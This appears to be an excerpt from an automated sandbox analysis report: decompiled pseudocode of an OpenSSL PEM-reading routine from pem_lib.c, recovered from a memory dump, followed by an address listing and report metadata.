                                                                                                    				_t251 = _a396;
                                                                                                    				_a20 = _a408;
                                                                                                    				_a12 = _t251;
                                                                                                    				_a24 = _a412;
                                                                                                    				_a4 = 0;
                                                                                                    				_t236 = E0045AF30(__ebx, __edx, _t251);
                                                                                                    				_a8 = _t236;
                                                                                                    				_t257 = E0045AF30(_t236, __edx, _t251);
                                                                                                    				_v0 = _t257;
                                                                                                    				_t269 = E0045AF30(_t236, __edx, _t251);
                                                                                                    				if(_t236 == 0 || _t257 == 0 || _t269 == 0) {
                                                                                                    					E0045AD10(_t236);
                                                                                                    					E0045AD10(_t257);
                                                                                                    					E0045AD10(_t269);
                                                                                                    					E004512D0(_t236, _t247, _t251, _t269, __eflags, 9, 0x6d, 0x41, ".\\crypto\\pem\\pem_lib.c", 0x2b4);
                                                                                                    					_t272 = _t271 + 0x20;
                                                                                                    					goto L72;
                                                                                                    				} else {
                                                                                                    					_a386 = 0;
                                                                                                    					_t141 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
                                                                                                    					_t274 = _t271 + 0xc;
                                                                                                    					_t284 = _t141;
                                                                                                    					if(_t284 <= 0) {
                                                                                                    						L14:
                                                                                                    						_push(0x2bf);
                                                                                                    						_push(".\\crypto\\pem\\pem_lib.c");
                                                                                                    						_push(0x6c);
                                                                                                    						goto L15;
                                                                                                    					} else {
                                                                                                    						do {
                                                                                                    							if(_t284 >= 0) {
                                                                                                    								while( *((char*)(_t274 + _t141 + 0x94)) <= 0x20) {
                                                                                                    									_t141 = _t141 - 1;
                                                                                                    									if(_t141 >= 0) {
                                                                                                    										continue;
                                                                                                    									}
                                                                                                    									goto L8;
                                                                                                    								}
                                                                                                    							}
                                                                                                    							L8:
                                                                                                    							 *((char*)(_t274 + _t141 + 0x95)) = 0xa;
                                                                                                    							_t146 = _t141 + 2;
                                                                                                    							if(_t146 >= 0x100) {
                                                                                                    								L74:
                                                                                                    								E0042AC83();
                                                                                                    								asm("int3");
                                                                                                    								asm("int3");
                                                                                                    								asm("int3");
                                                                                                    								asm("int3");
                                                                                                    								asm("int3");
                                                                                                    								asm("int3");
                                                                                                    								asm("int3");
                                                                                                    								asm("int3");
                                                                                                    								_push(_t251);
                                                                                                    								_t253 = E0044F960(_t236, _t247, E004656B0());
                                                                                                    								__eflags = _t253;
                                                                                                    								if(__eflags != 0) {
                                                                                                    									_push(_t257);
                                                                                                    									E0044F3E0(_t253, _t269, _t253, 0x6a, 0, _v12);
                                                                                                    									_push(_a4);
                                                                                                    									_push(_v0);
                                                                                                    									_push(_v4);
                                                                                                    									_push(_v8);
                                                                                                    									_push(_t253);
                                                                                                    									_t151 = E00463C30(_t247, _t269);
                                                                                                    									E0044F5E0(_t253);
                                                                                                    									return _t151;
                                                                                                    								} else {
                                                                                                    									E004512D0(_t236, _t247, _t253, _t269, __eflags, 9, 0x71, 7, ".\\crypto\\pem\\pem_lib.c", 0x248);
                                                                                                    									__eflags = 0;
                                                                                                    									return 0;
                                                                                                    								}
                                                                                                    							} else {
                                                                                                    								 *((char*)(_t274 + _t146 + 0x98)) = 0;
                                                                                                    								_t157 = E00448190( &_a132, "-----BEGIN ", 0xb);
                                                                                                    								_t279 = _t274 + 0xc;
                                                                                                    								if(_t157 != 0) {
                                                                                                    									goto L13;
                                                                                                    								} else {
                                                                                                    									_t261 =  &_a143;
                                                                                                    									_t240 = _t261 + 1;
                                                                                                    									do {
                                                                                                    										_t159 =  *_t261;
                                                                                                    										_t261 = _t261 + 1;
                                                                                                    									} while (_t159 != 0);
                                                                                                    									_t257 = _t261 - _t240;
                                                                                                    									_t162 = E00448190( &_a137 + _t257, "-----\n", 6);
                                                                                                    									_t279 = _t279 + 0xc;
                                                                                                    									if(_t162 == 0) {
                                                                                                    										_t164 = E0045AD50(_t236, _t247, _t269, _t236, _t257 + 9);
                                                                                                    										_t274 = _t279 + 8;
                                                                                                    										__eflags = _t164;
                                                                                                    										if(__eflags != 0) {
                                                                                                    											E0042D8D0( *((intOrPtr*)(_t236 + 4)),  &_a143, _t257 - 6);
                                                                                                    											_t168 =  *((intOrPtr*)(_t236 + 4));
                                                                                                    											_t236 = 0;
                                                                                                    											 *((char*)(_t168 + _t257 - 6)) = 0;
                                                                                                    											_t262 = _v0;
                                                                                                    											_t169 = E0045AD50(0, _t247, _t269, _t262, 0x100);
                                                                                                    											_t274 = _t274 + 0x14;
                                                                                                    											__eflags = _t169;
                                                                                                    											if(__eflags != 0) {
                                                                                                    												 *((char*)( *((intOrPtr*)(_t262 + 4)))) = 0;
                                                                                                    												_t263 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
                                                                                                    												_t274 = _t274 + 0xc;
                                                                                                    												__eflags = _t263;
                                                                                                    												if(__eflags <= 0) {
                                                                                                    													L32:
                                                                                                    													_t264 = 0;
                                                                                                    													__eflags = 0;
                                                                                                    													goto L33;
                                                                                                    												} else {
                                                                                                    													do {
                                                                                                    														if(__eflags >= 0) {
                                                                                                    															while(1) {
                                                                                                    																__eflags =  *((char*)(_t274 + _t263 + 0x94)) - 0x20;
                                                                                                    																if( *((char*)(_t274 + _t263 + 0x94)) > 0x20) {
                                                                                                    																	goto L27;
                                                                                                    																}
                                                                                                    																_t263 = _t263 - 1;
                                                                                                    																__eflags = _t263;
                                                                                                    																if(_t263 >= 0) {
                                                                                                    																	continue;
                                                                                                    																}
                                                                                                    																goto L27;
                                                                                                    															}
                                                                                                    														}
                                                                                                    														L27:
                                                                                                    														 *((char*)(_t274 + _t263 + 0x95)) = 0xa;
                                                                                                    														_t257 = _t263 + 2;
                                                                                                    														__eflags = _t257 - 0x100;
                                                                                                    														if(_t257 >= 0x100) {
                                                                                                    															goto L74;
                                                                                                    														} else {
                                                                                                    															 *((char*)(_t274 + _t257 + 0x94)) = 0;
                                                                                                    															__eflags = _a132 - 0xa;
                                                                                                    															if(_a132 == 0xa) {
                                                                                                    																goto L32;
                                                                                                    															} else {
                                                                                                    																_t251 = _t257 + _t236;
                                                                                                    																_t222 = E0045AD50(_t236, _t247, _t269, _v0, _t251 + 9);
                                                                                                    																_t274 = _t274 + 8;
                                                                                                    																__eflags = _t222;
                                                                                                    																if(__eflags == 0) {
                                                                                                    																	_push(0x2e4);
                                                                                                    																	goto L22;
                                                                                                    																} else {
                                                                                                    																	_t224 = E00448190( &_a132, "-----END ", 9);
                                                                                                    																	_t274 = _t274 + 0xc;
                                                                                                    																	__eflags = _t224;
                                                                                                    																	if(_t224 == 0) {
                                                                                                    																		_t251 = _a12;
                                                                                                    																		_t264 = 1;
                                                                                                    																		L33:
                                                                                                    																		_a4 = 0;
                                                                                                    																		_t173 = E0045AD50(_t236, _t247, _t269, _t269, 0x400);
                                                                                                    																		_t274 = _t274 + 8;
                                                                                                    																		__eflags = _t173;
                                                                                                    																		if(__eflags != 0) {
                                                                                                    																			 *_a4 = 0;
                                                                                                    																			__eflags = _t264;
                                                                                                    																			if(_t264 != 0) {
                                                                                                    																				_t251 = _t269;
                                                                                                    																				_v0 = _t251;
                                                                                                    																				_t269 = _v0;
                                                                                                    																				_a4 = _t236;
                                                                                                    																				goto L51;
                                                                                                    																			} else {
                                                                                                    																				_t267 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
                                                                                                    																				_t274 = _t274 + 0xc;
                                                                                                    																				__eflags = _t267;
                                                                                                    																				if(_t267 <= 0) {
                                                                                                    																					L50:
                                                                                                    																					_t251 = _v0;
                                                                                                    																					L51:
                                                                                                    																					_t236 = _a8;
                                                                                                    																					_t265 =  *((intOrPtr*)(_t236 + 4));
                                                                                                    																					_t83 = _t265 + 1; // 0x9
                                                                                                    																					_t241 = _t83;
                                                                                                    																					do {
                                                                                                    																						_t176 =  *_t265;
                                                                                                    																						_t265 = _t265 + 1;
                                                                                                    																						__eflags = _t176;
                                                                                                    																					} while (_t176 != 0);
                                                                                                    																					_t266 = _t265 - _t241;
                                                                                                    																					_t178 = E00448190( &_a132, "-----END ", 9);
                                                                                                    																					_t274 = _t274 + 0xc;
                                                                                                    																					__eflags = _t178;
                                                                                                    																					if(__eflags != 0) {
                                                                                                    																						L70:
                                                                                                    																						_push(0x322);
                                                                                                    																						_push(".\\crypto\\pem\\pem_lib.c");
                                                                                                    																						_push(0x66);
                                                                                                    																						goto L15;
                                                                                                    																					} else {
                                                                                                    																						_t180 = E00448190( *((intOrPtr*)(_t236 + 4)),  &_a141, _t266);
                                                                                                    																						_t274 = _t274 + 0xc;
                                                                                                    																						__eflags = _t180;
                                                                                                    																						if(__eflags != 0) {
                                                                                                    																							goto L70;
                                                                                                    																						} else {
                                                                                                    																							_t183 = E00448190( &_a141 + _t266, "-----\n", 6);
                                                                                                    																							_t274 = _t274 + 0xc;
                                                                                                    																							__eflags = _t183;
                                                                                                    																							if(__eflags != 0) {
                                                                                                    																								goto L70;
                                                                                                    																							} else {
                                                                                                    																								E0047E5B0( &_a36);
                                                                                                    																								_push(_a4);
                                                                                                    																								_t186 = _a4;
                                                                                                    																								_push(_t186);
                                                                                                    																								_push( &_a4);
                                                                                                    																								_push(_t186);
                                                                                                    																								_push( &_a36);
                                                                                                    																								_t188 = E0047E5D0();
                                                                                                    																								_t274 = _t274 + 0x18;
                                                                                                    																								__eflags = _t188;
                                                                                                    																								if(__eflags >= 0) {
                                                                                                    																									_t193 = E0047E560( &_a36, _a4 + _a4,  &_a32);
                                                                                                    																									_t275 = _t274 + 0xc;
                                                                                                    																									__eflags = _t193;
                                                                                                    																									if(__eflags >= 0) {
                                                                                                    																										_t244 = _a4 + _a32;
                                                                                                    																										__eflags = _t244;
                                                                                                    																										_a4 = _t244;
                                                                                                    																										if(_t244 == 0) {
                                                                                                    																											goto L17;
                                                                                                    																										} else {
                                                                                                    																											 *_a16 =  *((intOrPtr*)(_t236 + 4));
                                                                                                    																											 *_a28 =  *((intOrPtr*)(_t251 + 4));
                                                                                                    																											_t247 = _a20;
                                                                                                    																											 *_a20 = _a4;
                                                                                                    																											 *_a24 = _t244;
                                                                                                    																											E00454C70(_t236);
                                                                                                    																											E00454C70(_t251);
                                                                                                    																											E00454C70(_t269);
                                                                                                    																											_t272 = _t275 + 0xc;
                                                                                                    																										}
                                                                                                    																									} else {
                                                                                                    																										_push(0x332);
                                                                                                    																										_push(".\\crypto\\pem\\pem_lib.c");
                                                                                                    																										_push(0x64);
                                                                                                    																										goto L15;
                                                                                                    																									}
                                                                                                    																								} else {
                                                                                                    																									_push(0x32c);
                                                                                                    																									_push(".\\crypto\\pem\\pem_lib.c");
                                                                                                    																									_push(0x64);
                                                                                                    																									goto L15;
                                                                                                    																								}
                                                                                                    																							}
                                                                                                    																						}
                                                                                                    																					}
                                                                                                    																					goto L73;
                                                                                                    																				} else {
                                                                                                    																					_t236 = 0;
                                                                                                    																					__eflags = _t267;
                                                                                                    																					do {
                                                                                                    																						if(__eflags >= 0) {
                                                                                                    																							while(1) {
                                                                                                    																								__eflags =  *((char*)(_t274 + _t267 + 0x94)) - 0x20;
                                                                                                    																								if( *((char*)(_t274 + _t267 + 0x94)) > 0x20) {
                                                                                                    																									goto L44;
                                                                                                    																								}
                                                                                                    																								_t267 = _t267 - 1;
                                                                                                    																								__eflags = _t267;
                                                                                                    																								if(_t267 >= 0) {
                                                                                                    																									continue;
                                                                                                    																								}
                                                                                                    																								goto L44;
                                                                                                    																							}
                                                                                                    																						}
                                                                                                    																						L44:
                                                                                                    																						 *((char*)(_t274 + _t267 + 0x95)) = 0xa;
                                                                                                    																						_t257 = _t267 + 2;
                                                                                                    																						__eflags = _t257 - 0x100;
                                                                                                    																						if(_t257 >= 0x100) {
                                                                                                    																							goto L74;
                                                                                                    																						} else {
                                                                                                    																							__eflags = _t257 - 0x41;
                                                                                                    																							 *((char*)(_t274 + _t257 + 0x94)) = 0;
                                                                                                    																							_t236 =  !=  ? 1 : _t236;
                                                                                                    																							_t206 = E00448190( &_a132, "-----END ", 9);
                                                                                                    																							_t274 = _t274 + 0xc;
                                                                                                    																							__eflags = _t206;
                                                                                                    																							if(_t206 == 0) {
                                                                                                    																								goto L50;
                                                                                                    																							} else {
                                                                                                    																								__eflags = _t257 - 0x41;
                                                                                                    																								if(_t257 > 0x41) {
                                                                                                    																									goto L50;
                                                                                                    																								} else {
                                                                                                    																									_t210 = E0045AE30(_t236, _t247, _t269, _t269, _a4 + 9 + _t257);
                                                                                                    																									_t274 = _t274 + 8;
                                                                                                    																									__eflags = _t210;
                                                                                                    																									if(__eflags == 0) {
                                                                                                    																										_push(0x303);
                                                                                                    																										goto L22;
                                                                                                    																									} else {
                                                                                                    																										E0042D8D0(_a4 + _a4,  &_a132, _t257);
                                                                                                    																										_t280 = _t274 + 0xc;
                                                                                                    																										_push(0xfe);
                                                                                                    																										 *((char*)(_a4 + _t257 + _a4)) = 0;
                                                                                                    																										_a4 = _a4 + _t257;
                                                                                                    																										_push( &_a132);
                                                                                                    																										_push(_t251);
                                                                                                    																										__eflags = _t236;
                                                                                                    																										if(_t236 != 0) {
                                                                                                    																											_a132 = 0;
                                                                                                    																											_t218 = E0044F780(_t251, _t269);
                                                                                                    																											_t274 = _t280 + 0xc;
                                                                                                    																											__eflags = _t218;
                                                                                                    																											if(_t218 <= 0) {
                                                                                                    																												goto L50;
                                                                                                    																											} else {
                                                                                                    																												while(1) {
                                                                                                    																													__eflags =  *((char*)(_t274 + _t218 + 0x94)) - 0x20;
                                                                                                    																													if( *((char*)(_t274 + _t218 + 0x94)) > 0x20) {
                                                                                                    																														break;
                                                                                                    																													}
                                                                                                    																													_t218 = _t218 - 1;
                                                                                                    																													__eflags = _t218;
                                                                                                    																													if(_t218 >= 0) {
                                                                                                    																														continue;
                                                                                                    																													}
                                                                                                    																													break;
                                                                                                    																												}
                                                                                                    																												 *((char*)(_t274 + _t218 + 0x95)) = 0xa;
                                                                                                    																												_t219 = _t218 + 2;
                                                                                                    																												__eflags = _t219 - 0x100;
                                                                                                    																												if(_t219 >= 0x100) {
                                                                                                    																													goto L74;
                                                                                                    																												} else {
                                                                                                    																													 *((char*)(_t274 + _t219 + 0x94)) = 0;
                                                                                                    																													goto L50;
                                                                                                    																												}
                                                                                                    																											}
                                                                                                    																										} else {
                                                                                                    																											goto L49;
                                                                                                    																										}
                                                                                                    																									}
                                                                                                    																								}
                                                                                                    																							}
                                                                                                    																						}
                                                                                                    																						goto L77;
                                                                                                    																						L49:
                                                                                                    																						_t267 = E0044F780(_t251, _t269);
                                                                                                    																						_t274 = _t280 + 0xc;
                                                                                                    																						__eflags = _t267;
                                                                                                    																					} while (__eflags > 0);
                                                                                                    																					goto L50;
                                                                                                    																				}
                                                                                                    																			}
                                                                                                    																		} else {
                                                                                                    																			_push(0x2f1);
                                                                                                    																			goto L22;
                                                                                                    																		}
                                                                                                    																	} else {
                                                                                                    																		goto L31;
                                                                                                    																	}
                                                                                                    																}
                                                                                                    															}
                                                                                                    														}
                                                                                                    														goto L77;
                                                                                                    														L31:
                                                                                                    														E0042D8D0( *((intOrPtr*)(_v0 + 4)) + _t236,  &_a132, _t257);
                                                                                                    														 *((char*)( *((intOrPtr*)(_v0 + 4)) + _t257 + _t236)) = 0;
                                                                                                    														_t236 = _t251;
                                                                                                    														_t251 = _a12;
                                                                                                    														_t263 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
                                                                                                    														_t274 = _t274 + 0x18;
                                                                                                    														__eflags = _t263;
                                                                                                    													} while (__eflags > 0);
                                                                                                    													goto L32;
                                                                                                    												}
                                                                                                    											} else {
                                                                                                    												_push(0x2d8);
                                                                                                    												L22:
                                                                                                    												_push(".\\crypto\\pem\\pem_lib.c");
                                                                                                    												_push(0x41);
                                                                                                    												_push(0x6d);
                                                                                                    												_push(9);
                                                                                                    												E004512D0(_t236, _t247, _t251, _t269, __eflags);
                                                                                                    												_t236 = _a8;
                                                                                                    												goto L16;
                                                                                                    											}
                                                                                                    										} else {
                                                                                                    											_push(0x2ce);
                                                                                                    											_push(".\\crypto\\pem\\pem_lib.c");
                                                                                                    											_push(0x41);
                                                                                                    											L15:
                                                                                                    											_push(0x6d);
                                                                                                    											_push(9);
                                                                                                    											E004512D0(_t236, _t247, _t251, _t269, _t291);
                                                                                                    											L16:
                                                                                                    											_t275 = _t274 + 0x14;
                                                                                                    											L17:
                                                                                                    											E0045AD10(_t236);
                                                                                                    											E0045AD10(_v0);
                                                                                                    											E0045AD10(_t269);
                                                                                                    											_t272 = _t275 + 0xc;
                                                                                                    											L72:
                                                                                                    											L73:
                                                                                                    											_pop(_t252);
                                                                                                    											_pop(_t258);
                                                                                                    											_pop(_t237);
                                                                                                    											return E0042A77E(_t237, _a388 ^ _t272, _t247, _t252, _t258);
                                                                                                    										}
                                                                                                    									} else {
                                                                                                    										goto L13;
                                                                                                    									}
                                                                                                    								}
                                                                                                    							}
                                                                                                    							goto L77;
                                                                                                    							L13:
                                                                                                    							_t141 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
                                                                                                    							_t274 = _t279 + 0xc;
                                                                                                    							_t291 = _t141;
                                                                                                    						} while (_t141 > 0);
                                                                                                    						goto L14;
                                                                                                    					}
                                                                                                    				}
                                                                                                    				L77:
                                                                                                    			}


























































                                                                                                    0x004635b0
                                                                                                    0x004635b5
                                                                                                    0x004635ba
                                                                                                    0x004635c1
                                                                                                    0x004635cf
                                                                                                    0x004635d0
                                                                                                    0x004635db
                                                                                                    0x004635dc
                                                                                                    0x004635e9
                                                                                                    0x004635f0
                                                                                                    0x004635fb
                                                                                                    0x004635ff
                                                                                                    0x00463603
                                                                                                    0x00463610
                                                                                                    0x00463612
                                                                                                    0x0046361b
                                                                                                    0x0046361d
                                                                                                    0x00463626
                                                                                                    0x0046362a
                                                                                                    0x00463b6f
                                                                                                    0x00463b75
                                                                                                    0x00463b7b
                                                                                                    0x00463b90
                                                                                                    0x00463b95
                                                                                                    0x00000000
                                                                                                    0x00463640
                                                                                                    0x0046364c
                                                                                                    0x00463656
                                                                                                    0x0046365b
                                                                                                    0x0046365e
                                                                                                    0x00463660
                                                                                                    0x00463704
                                                                                                    0x00463704
                                                                                                    0x00463709
                                                                                                    0x0046370e
                                                                                                    0x00000000
                                                                                                    0x00463666
                                                                                                    0x00463666
                                                                                                    0x00463666
                                                                                                    0x00463670
                                                                                                    0x0046367a
                                                                                                    0x0046367b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0046367b
                                                                                                    0x00463670
                                                                                                    0x0046367d
                                                                                                    0x0046367d
                                                                                                    0x00463685
                                                                                                    0x0046368d
                                                                                                    0x00463bb3
                                                                                                    0x00463bb3
                                                                                                    0x00463bb8
                                                                                                    0x00463bb9
                                                                                                    0x00463bba
                                                                                                    0x00463bbb
                                                                                                    0x00463bbc
                                                                                                    0x00463bbd
                                                                                                    0x00463bbe
                                                                                                    0x00463bbf
                                                                                                    0x00463bc0
                                                                                                    0x00463bcc
                                                                                                    0x00463bd1
                                                                                                    0x00463bd3
                                                                                                    0x00463bf1
                                                                                                    0x00463bfb
                                                                                                    0x00463c00
                                                                                                    0x00463c04
                                                                                                    0x00463c08
                                                                                                    0x00463c0c
                                                                                                    0x00463c10
                                                                                                    0x00463c11
                                                                                                    0x00463c19
                                                                                                    0x00463c25
                                                                                                    0x00463bd5
                                                                                                    0x00463be5
                                                                                                    0x00463bed
                                                                                                    0x00463bf0
                                                                                                    0x00463bf0
                                                                                                    0x00463693
                                                                                                    0x00463695
                                                                                                    0x004636aa
                                                                                                    0x004636af
                                                                                                    0x004636b4
                                                                                                    0x00000000
                                                                                                    0x004636b6
                                                                                                    0x004636b6
                                                                                                    0x004636bd
                                                                                                    0x004636c0
                                                                                                    0x004636c0
                                                                                                    0x004636c2
                                                                                                    0x004636c3
                                                                                                    0x004636c7
                                                                                                    0x004636da
                                                                                                    0x004636df
                                                                                                    0x004636e4
                                                                                                    0x0046373e
                                                                                                    0x00463743
                                                                                                    0x00463746
                                                                                                    0x00463748
                                                                                                    0x00463767
                                                                                                    0x0046376c
                                                                                                    0x0046376f
                                                                                                    0x00463776
                                                                                                    0x0046377b
                                                                                                    0x00463780
                                                                                                    0x00463785
                                                                                                    0x00463788
                                                                                                    0x0046378a
                                                                                                    0x004637b2
                                                                                                    0x004637c2
                                                                                                    0x004637c4
                                                                                                    0x004637c7
                                                                                                    0x004637c9
                                                                                                    0x0046388c
                                                                                                    0x0046388c
                                                                                                    0x0046388c
                                                                                                    0x00000000
                                                                                                    0x004637cf
                                                                                                    0x004637cf
                                                                                                    0x004637cf
                                                                                                    0x004637d1
                                                                                                    0x004637d1
                                                                                                    0x004637d9
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004637db
                                                                                                    0x004637db
                                                                                                    0x004637dc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004637dc
                                                                                                    0x004637d1
                                                                                                    0x004637de
                                                                                                    0x004637de
                                                                                                    0x004637e6
                                                                                                    0x004637e9
                                                                                                    0x004637ef
                                                                                                    0x00000000
                                                                                                    0x004637f5
                                                                                                    0x004637f5
                                                                                                    0x004637fd
                                                                                                    0x00463805
                                                                                                    0x00000000
                                                                                                    0x0046380b
                                                                                                    0x0046380b
                                                                                                    0x00463816
                                                                                                    0x0046381b
                                                                                                    0x0046381e
                                                                                                    0x00463820
                                                                                                    0x004638bd
                                                                                                    0x00000000
                                                                                                    0x00463826
                                                                                                    0x00463835
                                                                                                    0x0046383a
                                                                                                    0x0046383d
                                                                                                    0x0046383f
                                                                                                    0x004638b2
                                                                                                    0x004638b6
                                                                                                    0x0046388e
                                                                                                    0x00463894
                                                                                                    0x0046389c
                                                                                                    0x004638a1
                                                                                                    0x004638a4
                                                                                                    0x004638a6
                                                                                                    0x004638ca
                                                                                                    0x004638cd
                                                                                                    0x004638cf
                                                                                                    0x00463ace
                                                                                                    0x00463ad0
                                                                                                    0x00463ad4
                                                                                                    0x00463ad6
                                                                                                    0x00000000
                                                                                                    0x004638d5
                                                                                                    0x004638e8
                                                                                                    0x004638ea
                                                                                                    0x004638ed
                                                                                                    0x004638ef
                                                                                                    0x004639c4
                                                                                                    0x004639c4
                                                                                                    0x004639c8
                                                                                                    0x004639c8
                                                                                                    0x004639cc
                                                                                                    0x004639cf
                                                                                                    0x004639cf
                                                                                                    0x004639d2
                                                                                                    0x004639d2
                                                                                                    0x004639d4
                                                                                                    0x004639d5
                                                                                                    0x004639d5
                                                                                                    0x004639e2
                                                                                                    0x004639ea
                                                                                                    0x004639ef
                                                                                                    0x004639f2
                                                                                                    0x004639f4
                                                                                                    0x00463b5d
                                                                                                    0x00463b5d
                                                                                                    0x00463b62
                                                                                                    0x00463b67
                                                                                                    0x00000000
                                                                                                    0x004639fa
                                                                                                    0x00463a06
                                                                                                    0x00463a0b
                                                                                                    0x00463a0e
                                                                                                    0x00463a10
                                                                                                    0x00000000
                                                                                                    0x00463a16
                                                                                                    0x00463a27
                                                                                                    0x00463a2c
                                                                                                    0x00463a2f
                                                                                                    0x00463a31
                                                                                                    0x00000000
                                                                                                    0x00463a37
                                                                                                    0x00463a3c
                                                                                                    0x00463a41
                                                                                                    0x00463a45
                                                                                                    0x00463a4c
                                                                                                    0x00463a4d
                                                                                                    0x00463a4e
                                                                                                    0x00463a53
                                                                                                    0x00463a54
                                                                                                    0x00463a59
                                                                                                    0x00463a5c
                                                                                                    0x00463a5e
                                                                                                    0x00463af1
                                                                                                    0x00463af6
                                                                                                    0x00463af9
                                                                                                    0x00463afb
                                                                                                    0x00463b12
                                                                                                    0x00463b12
                                                                                                    0x00463b16
                                                                                                    0x00463b1a
                                                                                                    0x00000000
                                                                                                    0x00463b20
                                                                                                    0x00463b28
                                                                                                    0x00463b31
                                                                                                    0x00463b33
                                                                                                    0x00463b3a
                                                                                                    0x00463b40
                                                                                                    0x00463b42
                                                                                                    0x00463b48
                                                                                                    0x00463b4e
                                                                                                    0x00463b53
                                                                                                    0x00463b56
                                                                                                    0x00463afd
                                                                                                    0x00463afd
                                                                                                    0x00463b02
                                                                                                    0x00463b07
                                                                                                    0x00000000
                                                                                                    0x00463b07
                                                                                                    0x00463a64
                                                                                                    0x00463a64
                                                                                                    0x00463a69
                                                                                                    0x00463a6e
                                                                                                    0x00000000
                                                                                                    0x00463a6e
                                                                                                    0x00463a5e
                                                                                                    0x00463a31
                                                                                                    0x00463a10
                                                                                                    0x00000000
                                                                                                    0x004638f5
                                                                                                    0x004638f5
                                                                                                    0x004638f7
                                                                                                    0x004638f9
                                                                                                    0x004638f9
                                                                                                    0x00463900
                                                                                                    0x00463900
                                                                                                    0x00463908
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0046390a
                                                                                                    0x0046390a
                                                                                                    0x0046390b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0046390b
                                                                                                    0x00463900
                                                                                                    0x0046390d
                                                                                                    0x0046390d
                                                                                                    0x00463915
                                                                                                    0x00463918
                                                                                                    0x0046391e
                                                                                                    0x00000000
                                                                                                    0x00463924
                                                                                                    0x00463924
                                                                                                    0x00463927
                                                                                                    0x00463936
                                                                                                    0x00463946
                                                                                                    0x0046394b
                                                                                                    0x0046394e
                                                                                                    0x00463950
                                                                                                    0x00000000
                                                                                                    0x00463952
                                                                                                    0x00463952
                                                                                                    0x00463955
                                                                                                    0x00000000
                                                                                                    0x00463957
                                                                                                    0x00463962
                                                                                                    0x00463967
                                                                                                    0x0046396a
                                                                                                    0x0046396c
                                                                                                    0x00463ac0
                                                                                                    0x00000000
                                                                                                    0x00463972
                                                                                                    0x00463983
                                                                                                    0x0046398b
                                                                                                    0x00463994
                                                                                                    0x00463999
                                                                                                    0x004639a4
                                                                                                    0x004639a8
                                                                                                    0x004639a9
                                                                                                    0x004639aa
                                                                                                    0x004639ac
                                                                                                    0x00463a75
                                                                                                    0x00463a7d
                                                                                                    0x00463a82
                                                                                                    0x00463a85
                                                                                                    0x00463a87
                                                                                                    0x00000000
                                                                                                    0x00463a90
                                                                                                    0x00463a90
                                                                                                    0x00463a90
                                                                                                    0x00463a98
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00463a9a
                                                                                                    0x00463a9a
                                                                                                    0x00463a9b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00463a9b
                                                                                                    0x00463a9d
                                                                                                    0x00463aa5
                                                                                                    0x00463aa8
                                                                                                    0x00463aad
                                                                                                    0x00000000
                                                                                                    0x00463ab3
                                                                                                    0x00463ab3
                                                                                                    0x00000000
                                                                                                    0x00463ab3
                                                                                                    0x00463aad
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004639ac
                                                                                                    0x0046396c
                                                                                                    0x00463955
                                                                                                    0x00463950
                                                                                                    0x00000000
                                                                                                    0x004639b2
                                                                                                    0x004639b7
                                                                                                    0x004639b9
                                                                                                    0x004639bc
                                                                                                    0x004639bc
                                                                                                    0x00000000
                                                                                                    0x004638f9
                                                                                                    0x004638ef
                                                                                                    0x004638a8
                                                                                                    0x004638a8
                                                                                                    0x00000000
                                                                                                    0x004638a8
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0046383f
                                                                                                    0x00463820
                                                                                                    0x00463805
                                                                                                    0x00000000
                                                                                                    0x00463841
                                                                                                    0x00463854
                                                                                                    0x00463867
                                                                                                    0x00463873
                                                                                                    0x00463875
                                                                                                    0x0046387f
                                                                                                    0x00463881
                                                                                                    0x00463884
                                                                                                    0x00463884
                                                                                                    0x00000000
                                                                                                    0x004637cf
                                                                                                    0x0046378c
                                                                                                    0x0046378c
                                                                                                    0x00463791
                                                                                                    0x00463791
                                                                                                    0x00463796
                                                                                                    0x00463798
                                                                                                    0x0046379a
                                                                                                    0x0046379c
                                                                                                    0x004637a1
                                                                                                    0x00000000
                                                                                                    0x004637a1
                                                                                                    0x0046374a
                                                                                                    0x0046374a
                                                                                                    0x0046374f
                                                                                                    0x00463754
                                                                                                    0x00463710
                                                                                                    0x00463710
                                                                                                    0x00463712
                                                                                                    0x00463714
                                                                                                    0x00463719
                                                                                                    0x00463719
                                                                                                    0x0046371c
                                                                                                    0x0046371d
                                                                                                    0x00463726
                                                                                                    0x0046372c
                                                                                                    0x00463731
                                                                                                    0x00463b98
                                                                                                    0x00463b9a
                                                                                                    0x00463ba1
                                                                                                    0x00463ba2
                                                                                                    0x00463ba4
                                                                                                    0x00463bb2
                                                                                                    0x00463bb2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004636e4
                                                                                                    0x004636b4
                                                                                                    0x00000000
                                                                                                    0x004636e6
                                                                                                    0x004636f4
                                                                                                    0x004636f9
                                                                                                    0x004636fc
                                                                                                    0x004636fc
                                                                                                    0x00000000
                                                                                                    0x00463666
                                                                                                    0x00463660
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _strncmp
                                                                                                    • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                    • API String ID: 909875538-2733969777
